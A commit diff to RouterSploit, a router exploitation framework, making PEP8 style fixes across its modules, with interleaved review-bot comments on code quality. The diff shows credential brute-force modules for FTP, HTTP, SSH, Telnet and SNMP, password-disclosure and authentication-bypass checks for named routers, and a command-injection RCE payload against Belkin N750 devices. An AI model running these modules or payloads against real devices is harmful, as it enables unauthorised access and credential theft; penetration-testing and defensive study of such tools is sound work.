Commit d4152b25 by Leonardo Lazzaro

fixed some PEP8 errors like mixed tabs and spaces, import *, etc

parent ebba273c
class RoutersploitException(Exception):
pass
\ No newline at end of file
pass
......@@ -226,7 +226,7 @@ class RoutersploitInterpreter(BaseInterpreter):
if self.current_module:
try:
return self.module_prompt_template.format(host=self.prompt_hostname, module=self.module_metadata['name'])
except (AttributeError, KeyError) as e:
except (AttributeError, KeyError):
return self.module_prompt_template.format(host=self.prompt_hostname, module="UnnamedModule")
else:
return self.raw_prompt_template.format(host=self.prompt_hostname)
......@@ -362,7 +362,7 @@ class RoutersploitInterpreter(BaseInterpreter):
return sub_commands
@utils.module_required
def command_check(self, *args, **kwargs):
def command_check(self, *args, **kwargs):
try:
result = self.current_module.check()
except:
......
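Review bot: The bare `except:` after `result = self.current_module.check()` in `command_check` is left in place by this cleanup, and it also catches `KeyboardInterrupt` and `SystemExit`, so a Ctrl-C during a slow check is caught here instead of stopping the command. `except Exception:` would keep the catch-all for module errors without trapping interpreter-exit signals. The handler body is outside the hunk, so this assumes it only reports the failure. The same bare `except:` appears as context in the `check()` methods of the exploit modules later in this commit.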
......@@ -3,7 +3,15 @@ import ftplib
import socket
import itertools
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -14,8 +22,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'FTP Bruteforce',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
......@@ -99,6 +107,6 @@ class Exploit(exploits.Exploit):
except:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
ftp.close()
ftp.close()
print_status(name, 'process is terminated.')
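Review bot: The explicit import list that replaces `from routersploit import *` is only safe if it names every routersploit symbol the module uses, and most of the module body lies outside the hunks shown here. A name that the star import used to supply and that is missing from the list will raise `NameError` only when the code path using it runs, for example inside a worker thread. Running `pyflakes` or `flake8` over each touched module would catch both missing and unused names before merge. The same applies to every other module in this commit that gets an explicit list.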
......@@ -2,7 +2,15 @@ import threading
import ftplib
import socket
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +21,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'FTP Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
......@@ -65,7 +73,7 @@ class Exploit(exploits.Exploit):
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
password = line[1].strip()
except StopIteration:
break
else:
......@@ -81,7 +89,7 @@ class Exploit(exploits.Exploit):
if retries > 2:
print_error("Too much connection problems. Quiting...")
return
try:
ftp.login(user, password)
......
......@@ -2,7 +2,16 @@ import threading
import requests
import itertools
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +22,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'HTTP Basic Bruteforce',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
......@@ -38,7 +47,7 @@ class Exploit(exploits.Exploit):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
print_error("Connection error: %s" % url)
return
if r.status_code != 401:
......
import threading
import requests
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -12,8 +21,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'HTTP Basic Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
......@@ -35,7 +44,7 @@ class Exploit(exploits.Exploit):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
print_error("Connection error: %s" % url)
return
if r.status_code != 401:
......
......@@ -3,7 +3,16 @@ import requests
import itertools
from bs4 import BeautifulSoup
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -14,8 +23,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'HTTP Form Bruteforce',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
......@@ -37,7 +46,7 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
try:
r = requests.get(url)
requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
......@@ -45,11 +54,11 @@ class Exploit(exploits.Exploit):
print_error("Connection error: %s" % url)
return
# authentication type
# authentication type
if self.form == 'auto':
self.data = self.detect_form()
if self.data == None:
if self.data is None:
print_error("Could not detect form")
return
else:
......@@ -105,10 +114,10 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
r = requests.get(url)
soup = BeautifulSoup(r.text, "lxml")
form = soup.find("form")
if form == None:
if form is None:
return None
if len(form) > 0:
......@@ -116,21 +125,21 @@ class Exploit(exploits.Exploit):
for inp in form.findAll("input"):
if 'name' in inp.attrs.keys():
if inp.attrs['name'].lower() in ["username", "user", "login"]:
res.append(inp.attrs['name']+"="+"{{USER}}")
res.append(inp.attrs['name'] + "=" + "{{USER}}")
elif inp.attrs['name'].lower() in ["password", "pass"]:
res.append(inp.attrs['name']+"="+"{{PASS}}")
res.append(inp.attrs['name'] + "=" + "{{PASS}}")
else:
if 'value' in inp.attrs.keys():
res.append(inp.attrs['name']+"="+inp.attrs['value'])
res.append(inp.attrs['name'] + "=" + inp.attrs['value'])
else:
res.append(inp.attrs['name']+"=")
res.append(inp.attrs['name'] + "=")
return '&'.join(res)
def target_function(self, running, data):
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...')
while running.is_set():
......@@ -153,4 +162,3 @@ class Exploit(exploits.Exploit):
break
print_status(name, 'process is terminated.')
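Review bot: `requests.get(url)` in the connectivity probe now discards its result but is still called without `timeout=`, so a target that accepts the connection and never answers blocks the module indefinitely; requests applies no timeout by default. Passing one, e.g. `requests.get(url, timeout=10)` (value constructed for illustration), and adding `requests.exceptions.Timeout` to the handled exceptions would make the probe fail cleanly. The `requests.get(url)` in the form-detection hunk has the same gap, as do the matching calls in the HTTP Form Default Creds module further down. The enclosing methods start outside the hunks.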
......@@ -2,7 +2,16 @@ import threading
import requests
from bs4 import BeautifulSoup
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +22,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'HTTP Form Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
......@@ -35,7 +44,7 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
try:
r = requests.get(url)
requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
......@@ -43,11 +52,11 @@ class Exploit(exploits.Exploit):
print_error("Connection error: %s" % url)
return
# authentication type
# authentication type
if self.form == 'auto':
self.data = self.detect_form()
if self.data == None:
if self.data is None:
print_error("Could not detect form")
return
else:
......@@ -98,10 +107,10 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
r = requests.get(url)
soup = BeautifulSoup(r.text, "lxml")
form = soup.find("form")
if form == None:
if form is None:
return None
if len(form) > 0:
......@@ -109,21 +118,21 @@ class Exploit(exploits.Exploit):
for inp in form.findAll("input"):
if 'name' in inp.attrs.keys():
if inp.attrs['name'].lower() in ["username", "user", "login"]:
res.append(inp.attrs['name']+"="+"{{USER}}")
res.append(inp.attrs['name'] + "=" + "{{USER}}")
elif inp.attrs['name'].lower() in ["password", "pass"]:
res.append(inp.attrs['name']+"="+"{{PASS}}")
res.append(inp.attrs['name'] + "=" + "{{PASS}}")
else:
if 'value' in inp.attrs.keys():
res.append(inp.attrs['name']+"="+inp.attrs['value'])
res.append(inp.attrs['name'] + "=" + inp.attrs['value'])
else:
res.append(inp.attrs['name']+"=")
res.append(inp.attrs['name'] + "=")
return '&'.join(res)
def target_function(self, running, data):
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...')
while running.is_set():
......@@ -146,4 +155,3 @@ class Exploit(exploits.Exploit):
break
print_status(name, 'process is terminated.')
import threading
import itertools
import netsnmp
import socket
from routersploit.utils import print_status, print_success, print_error, print_table, LockedIterator
from routersploit import exploits
......@@ -15,7 +13,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'SNMP Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
......@@ -45,7 +43,7 @@ class Exploit(exploits.Exploit):
print_table(headers, *self.strings)
else:
print_error("Valid community strings not found")
def target_function(self, running, data):
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
......@@ -57,9 +55,9 @@ class Exploit(exploits.Exploit):
string = data.next().strip()
bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
res = netsnmp.snmpget(bindvariable, Version = 1, DestHost = address, Community=string)
res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string)
if res[0] != None:
if res[0] is not None:
running.clear()
print_success("{}: Valid community string found!".format(name), string)
self.strings.append(tuple([string]))
......
......@@ -3,7 +3,15 @@ import itertools
import socket
import paramiko
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,7 +21,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'SSH Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
......@@ -60,7 +68,7 @@ class Exploit(exploits.Exploit):
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def target_function(self, running, data):
name = threading.current_thread().name
ssh = paramiko.SSHClient()
......
......@@ -2,7 +2,15 @@ import threading
import paramiko
import socket
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +21,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'SSH Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
......@@ -39,12 +47,12 @@ class Exploit(exploits.Exploit):
pass
ssh.close()
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
......@@ -72,7 +80,7 @@ class Exploit(exploits.Exploit):
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name, err,"Username: '{}' Password: '{}'".format(user, password))
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password))
else:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
......
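Review bot: `defaults = open(self.defaults[7:], 'r')` opens the credentials file and nothing visible in the hunk closes it, so the handle stays open until garbage collection. Reading it inside a context manager, `with open(self.defaults[7:], 'r') as f: defaults = f.readlines()`, hands the same lines to `LockedIterator` and releases the file before the threads start. The Telnet Default Creds module has the identical `open(...)` call. The method continues outside the hunk, so a later close cannot be ruled out.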
......@@ -2,7 +2,15 @@ import threading
import itertools
import telnetlib
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -12,7 +20,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Telnet Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
......@@ -55,7 +63,7 @@ class Exploit(exploits.Exploit):
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def target_function(self, running, data):
name = threading.current_thread().name
......@@ -79,13 +87,13 @@ class Exploit(exploits.Exploit):
tn.write(password + "\r\n")
tn.write("\r\n")
(i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password))
else:
if any(map(lambda x: x in res, ["#", "$",">"])) or len(res) > 500: # big banner e.g. mikrotik
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
self.credentials.append((user, password))
......@@ -100,5 +108,4 @@ class Exploit(exploits.Exploit):
return
continue
print_status(name, 'thread is terminated.')
import threading
import telnetlib
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -12,8 +20,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'Telnet Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
......@@ -40,7 +48,7 @@ class Exploit(exploits.Exploit):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
......@@ -73,13 +81,13 @@ class Exploit(exploits.Exploit):
tn.write(password + "\r\n")
tn.write("\r\n")
(i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password))
else:
if any(map(lambda x: x in res, ["#", "$",">"])) or len(res) > 500: # big banner e.g. mikrotik
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
self.credentials.append((user, password))
......@@ -92,6 +100,6 @@ class Exploit(exploits.Exploit):
if retries > 2:
print_error("Too much connection problems. Quiting...")
return
continue
continue
print_status(name, 'process is terminated.')
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,21 +17,21 @@ class Exploit(exploits.Exploit):
'name': '2Wire Gateway Auth Bypass',
'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. If the target is vulnerable link to bypass authentication is provided.',
'authors': [
'bugz', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'bugz', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/9459/',
],
'targets': [
],
'targets': [
'2Wire 2701HGV-W',
'2Wire 3800HGV-B',
'2Wire 3801HGV',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -40,7 +44,7 @@ class Exploit(exploits.Exploit):
def check(self):
# check if it is valid target
url = sanitize_url("{}:{}/".format(self.target, self.port))
try:
r = requests.get(url, verify=False)
res = r.text
......@@ -48,8 +52,8 @@ class Exploit(exploits.Exploit):
return None
if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
return False
return False
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/xslt".format(self.target, self.port))
try:
......@@ -57,9 +61,8 @@ class Exploit(exploits.Exploit):
res = r.text
except:
return None
if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_status,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -60,7 +67,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
......@@ -68,10 +74,9 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
if any(map(lambda x: x in res, ["pwdSupport", "pwdUser", "pwdAdmin"])):
return True # target vulnerable
return False # target not vulnerable
return False # target not vulnerable
import requests
from routersploit import *
from routersploit import (
exploits,
print_success,
print_status,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -11,8 +17,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'Asmax AR 804 RCE',
'authors': [
'Michal Sajdak <michal.sajdak@securitum.com>', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
'Michal Sajdak <michal.sajdak@securitum.com>', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
'references': [
......@@ -27,7 +33,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -65,4 +71,3 @@ class Exploit(exploits.Exploit):
return True
return False
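Review bot: `if self.check() is True:` in `run()` swaps one discouraged comparison for another; PEP 8 lists `is True` as worse than `== True` and recommends testing the value directly. The `check()` methods visible in this commit return `True`, `False` or `None`, so `if self.check():` should behave the same. It would also match the `run()` methods of the auth-bypass modules here, which already use that form. The same line appears in the Belkin N750 RCE and D-Link DIR-300 & DIR-600 RCE modules.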
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,25 +19,25 @@ class Exploit(exploits.Exploit):
'name': 'Asus RT-N16 Password Disclosure',
'description': 'Module exploits password disclosure vulnerability in Asus RT-N16 devices that allows to fetch credentials for the device.',
'authors': [
'Harry Sintonen', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'Harry Sintonen', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'references': [
'https://sintonen.fi/advisories/asus-router-auth-bypass.txt'
],
'targets': [
],
'targets': [
'ASUS RT-N10U, firmware 3.0.0.4.374_168',
'ASUS RT-N56U, firmware 3.0.0.4.374_979',
'ASUS DSL-N55U, firmware 3.0.0.4.374_1397',
'ASUS RT-AC66U, firmware 3.0.0.4.374_2050',
'ASUS RT-N15U, firmware 3.0.0.4.374_16',
'ASUS RT-N53, firmware 3.0.0.4.374_311',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
......@@ -43,11 +49,11 @@ class Exploit(exploits.Exploit):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
print_error("Connection error: %s" % url)
return
creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", res)
if len(creds):
c = [("admin", creds[0])]
print_success("Credentials found!")
......@@ -56,7 +62,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
......@@ -64,11 +69,10 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", res)
if len(creds):
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
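Review bot: The pattern passed to `re.findall` in `run()` and again in `check()` is a plain string containing `\(`, `\|` and `\)`, which are invalid string escapes that Python tolerates only by leaving the backslash in place; newer interpreters warn about them. Making it a raw string, `r"if\('1' == '0' \|\| '(.+?)' == 'admin'\)"`, keeps the regex identical and removes the reliance on that behaviour. Because the literal is duplicated, a single module-level pattern shared by both methods would also stop the two copies from drifting apart.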
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,9 +19,9 @@ class Exploit(exploits.Exploit):
'name': 'Belkin G & N150 Password Disclosure',
'description': 'Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format',
'authors': [
'Aodrulez <f3arm3d3ar[at]gmail.com>', # vulnerability discovery
'Avinash Tangirala', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Aodrulez <f3arm3d3ar[at]gmail.com>', # vulnerability discovery
'Avinash Tangirala', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765',
......@@ -58,12 +64,11 @@ class Exploit(exploits.Exploit):
r = requests.get(url, verify=False)
res = r.text
except:
return None # could not verify
return None # could not verify
val = re.findall('password = "(.+?)"', res)
if len(val):
return True # target vulnerable
return False # target is not vulnerable
return True # target vulnerable
return False # target is not vulnerable
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
'name': 'Belkin G Info Disclosure',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
'authors': [
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0403',
......@@ -38,7 +44,15 @@ class Exploit(exploits.Exploit):
print_error("Connection error: %s" % url)
return
var = ['pppoe_username','pppoe_password','wl0_pskkey','wl0_key1','mradius_password','mradius_secret','httpd_password','http_passwd','pppoe_passwd']
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
data = []
for v in var:
......@@ -63,12 +77,19 @@ class Exploit(exploits.Exploit):
r = requests.get(url, verify=False)
res = r.text
except:
return None # could not verify
var = ['pppoe_username','pppoe_password','wl0_pskkey','wl0_key1','mradius_password','mradius_secret','httpd_password','http_passwd','pppoe_passwd']
return None # could not verify
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
if any(map(lambda x: x in res, var)):
return True # target vulnerable
return False # target is not vulnerable
return False # target is not vulnerable
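Review bot: The nine-element `var` list is now written out in full twice, once in `run()` and once in `check()`, so a key added to one copy can be missed in the other. Defining it once as a class attribute and referring to it from both methods removes the duplication without changing behaviour. Both methods start outside the hunks, so this assumes neither copy is modified elsewhere in the method.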
import requests
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -12,9 +17,9 @@ class Exploit(exploits.Exploit):
'name': 'Belkin N150 Path Traversal',
'description': 'Module exploits Belkin N150 Path Traversal vulnerability which allows to read any file on the system.',
'authors': [
'Aditya Lad', # vulnerability discovery
'Rahul Pratap Singh', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Aditya Lad', # vulnerability discovery
'Rahul Pratap Singh', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/38488/',
......@@ -55,10 +60,9 @@ class Exploit(exploits.Exploit):
r = requests.get(url, verify=False)
res = r.text
except:
return None # could not verify
return None # could not verify
if "root:" in res:
return True # target vulnerable
return False # target is not vulnerable
return True # target vulnerable
return False # target is not vulnerable
import requests
from routersploit import *
from routersploit import (
exploits,
print_success,
print_status,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -12,8 +18,8 @@ class Exploit(exploits.Exploit):
'name': 'Belkin N750 RCE',
'description': 'Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.',
'authors': [
'Marco Vaz <mv[at]integrity.pt>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Marco Vaz <mv[at]integrity.pt>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635',
......@@ -29,7 +35,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -44,7 +50,7 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "GO=&jump="+"A"*1379 + ";{};&ps=\n\n".format(cmd)
data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)
try:
r = requests.post(url, headers=headers, data=data, verify=False)
......@@ -60,16 +66,15 @@ class Exploit(exploits.Exploit):
# todo random mark
url = sanitize_url("{}:{}/login.cgi".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "GO=&jump="+"A"*1379 + ";echo 9fdbd928b52c1ef61615a6fd2e8b49af;&ps=\n\n"
data = "GO=&jump=" + "A" * 1379 + ";echo 9fdbd928b52c1ef61615a6fd2e8b49af;&ps=\n\n"
try:
r = requests.post(url, headers=headers, data=data, verify=False)
res = r.text
except:
return None # could not verify
return None # could not verify
if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
return True # target vulnerable
return False # target is not vulnerable
return True # target vulnerable
return False # target is not vulnerable
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,22 +17,22 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
],
'targets': [
],
'targets': [
'D-Link DIR-300',
'D-Link DIR-600',
'D-Link DIR-615 revD',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -47,21 +51,20 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
return False
return False
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
try:
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
